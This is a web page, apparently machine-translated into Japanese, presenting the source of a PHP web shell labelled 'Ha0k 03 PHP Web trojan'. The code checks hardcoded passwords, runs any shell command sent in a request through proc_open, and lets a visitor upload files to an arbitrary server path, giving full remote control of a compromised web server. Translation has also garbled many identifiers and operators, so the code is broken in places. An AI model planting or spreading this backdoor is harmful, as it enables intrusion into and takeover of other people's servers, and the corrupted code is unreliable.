Ha0k 03 PHP Web トロイの木馬修正版

コードをコピーします コードは次のとおりです:

//ここに複数のユーザーを設定できます
$passwd = array('ha0k' => 'ha0k',
'hackerdsb'=>'hackerdsb');
/* ここに設定します コマンドエイリアス*/
$aliases = array('ls' => 'ipconfig',
'll' => 'ls -lvhF');
if (!isset($_SERVER['PHP_AUTH_USER'])|!isset ($_SERVER['PHP_AUTH_PW'])||
!isset($passwd[$_SERVER['PHP_AUTH_USER']]) || $passwd[$_SERVER['PHP_AUTH_USER']] != $_SERVER['PHP_AUTH_PW'] ) {
header('WWW-Authenticate: Basic realm="by Ha0k"');
$authenticated = false
}
else {
$authenticated = true; /* セッションを開始します */
session_start();
/* セッションを初期化します */
if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) {
$_SESSION ['cwd'] = getcwd(); // 現在のディレクトリを取得
$_SESSION['history'] = array();
$_SESSION['output'] = ''; _REQUEST['command'])) {
if (get_magic_quotes_gpc()) { //0 テーブルが閉じられ、1 つのテーブルがオン、オンの場合はフィルター
/*
の履歴にコマンドを追加したくない* エスケープ形式なのでバックスラッシュを削除します */
$_REQUEST['command'] =tripslashes($_REQUEST['command']); //addslashes() 関数で処理された文字列を元の状態に戻します
}
/* 履歴 */
if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== false) // 保存された配列内の値を検索
unset( $_SESSION ['history'][$i]); //
array_unshift($_SESSION['history'], $_REQUEST['command']); // array_unshift() 関数は、新しい項目を配列要素。そして、この新しい配列は元の配列の先頭に追加されます。この関数が最終的に返すのは、新しい要素を挿入した後の配列です。
/* 出力Ha0k# コマンド */
$_SESSION['output'] .= 'Ha0k# ' . $_REQUEST['コマンド'] 。 「ん」;
/* 現在の作業ディレクトリを初期化します。 */
if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {
$_SESSION['cwd'] = dirname( __ファイル__）; //获取当前所在目录
} elseif (ereg('^[[:blank:]]*cd[[:blank:]]]+([^;]+)$', $_REQUEST['command'], $ regs)) {
/* 現在のコマンドは 'cd' コマンドであり、
* を内部シェル コマンドとして処理する必要があります。 */
if ($regs[1][0] == '/') {
/* 絶対パス。変更せずに使用します。 */
$new_dir = $regs[1];
} else {
/* 相対パス。現在の作業ディレクトリ
* に追加します。 */
$new_dir = $_SESSION['cwd'] 。 '/' 。 $regs[1];
}
/* '/./' を '/' に変換します */
while (strpos($new_dir, '/./') !== false)
$new_dir = str_replace('/./', '/ '、$new_dir);
/* '//' を '/' に変換します */
while (strpos($new_dir, '//') !== false)
$new_dir = str_replace('//', '/', $new_dir) ;
/* 'x/..' を '' に変換します */
while (preg_match('|/..(?!.)|', $new_dir))
$new_dir = preg_replace('|/?[^/ ]+/..(?!.)|', '', $new_dir);
if ($new_dir == '') $new_dir = '/';
/* ディレクトリを変更してみます。 */
if (@chdir($new_dir)) { //改变当前目录
$_SESSION['cwd'] = $new_dir;
} else {
$_SESSION['output'] .= "cd: に変更できませんでした: $new_dirn";
}
} else {
/* このコマンドは「cd」コマンドではないため、
* ディレクトリを変更した後に実行し、出力を保存します。 */
chdir($_SESSION['cwd']); //改变目录
/* 别名扩展 */
$length = strcspn($_REQUEST['command'], " t"); //查找t文字列、戻り位置
$token = substr($_REQUEST['command'], 0, $length); //取字符串0-t
if (isset($aliases[$token]))
$_REQUEST['command'] = $aliases[$token] 。 substr($_REQUEST['コマンド'], $length);
$p = proc_open($_REQUEST['command'], //スクリプトを実行
array(1 => array('pipe', 'w'),
2 => array('pipe', 'w' ))、
$io);
/* 读出送信 */
while (!feof($io[1])) {
$_SESSION['output'] .= htmlspecialchars(fgets($io[1]), //转换特殊文字はHTML字符编码
ENT_COMPAT, 'GB2312');
}
/* 读出 */
while (!feof($io[2])) {
$_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
ENT_COMPAT, 'GB2312' );
}
fclose($io[1]);
fclose($io[2]);
proc_close($p);//关闭管道
}
}
/* 构建在JavaScript使用コマンド历史记录 */
if (empty($_SESSION['history'])) {
$js_command_hist = '""' ;
} else {
$escaped = array_map('addslashes', $_SESSION['history']);
$js_command_hist = '"", "' . implode('", "', $escaped) . '"';// 将数组搞成字串
}
}
header('Content-Type: text/html ; 文字セット=GB2312');
echo '' 。 「ん」;
?>
if(is_uploaded_file($HTTP_POST_FILES['userfile']['tmp_name'])) {
copy($HTTP_POST_FILES['userfile']['tmp_name'], $_POST['remotefile']);
//echo "上传文件成功: " . $HTTP_POST_FILES['ユーザーファイル']['名前'];
}
?>
BR>"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

HA0K

私たちは正義のために、正義のために戦います

PhpShell に対する認証に失敗しました。 href="">リロード ができます。もう一度試してください。

インストール を読んでみてください。 PhpShell のインストールで
問題が発生した場合は、このファイルを参照してください。